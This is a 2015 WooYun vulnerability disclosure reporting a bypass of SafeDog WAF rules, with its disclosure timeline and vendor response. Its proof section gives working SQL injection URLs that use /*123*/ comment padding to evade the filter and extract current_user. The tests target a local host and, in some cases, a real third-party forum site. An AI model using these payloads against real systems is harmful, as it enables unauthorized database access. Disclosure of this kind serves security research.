漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0103054
漏洞标题:网站安全狗防护规则绕过之二
相关厂商:安全狗
漏洞作者: HackBraid
提交时间:2015-03-23 11:03
修复时间:2015-06-26 11:05
公开时间:2015-06-26 11:05
漏洞类型:非授权访问/认证绕过
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-22: 细节向核心白帽子及相关领域专家公开
2015-06-01: 细节向普通白帽子公开
2015-06-11: 细节向实习白帽子公开
2015-06-26: 细节向公众公开
简要描述:
RT
详细说明:
测试了网站安全狗APACHE版和IIS版
1.安全狗官网下载网站安全狗(APACHE)最新版为V3.1.09924,网马库版本为:2015-02-28 测试发现存在另外一处防护规则绕过。
2.IIS版采用http://bbs.siteserver.cn/ 测试发现网站安全狗最新版存在该防护规则绕过~
漏洞证明:
一、本地测试网站安全狗(APACHE)最新版V3.1.09924
1.http://192.168.142.128/74/wap/wap-company-show.php?id=1%20union%20select%201,2,3,4,5
2.发现/*123*/可以成功绕过安全狗的检查
http://192.168.142.128/74/wap/wap-company-show.php?id=4/*123*/union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,44#
3.获取当前用户
http://192.168.142.128/74/wap/wap-company-show.php?id=4/*123*/union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,44#
二、IIS版采用http://bbs.siteserver.cn/
1.普通的拦截:
http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx?id=1%20and%201=1
2./*123*/绕过:
http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx?id=1/*123*/union/*123*/select/*123*/1,2,3,4,5
修复方案:
版权声明:转载请注明来源 HackBraid@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-26 11:05
厂商回复:
漏洞Rank:10 (WooYun评价)
最新状态:
2015-03-31:已经更新特征,感谢提交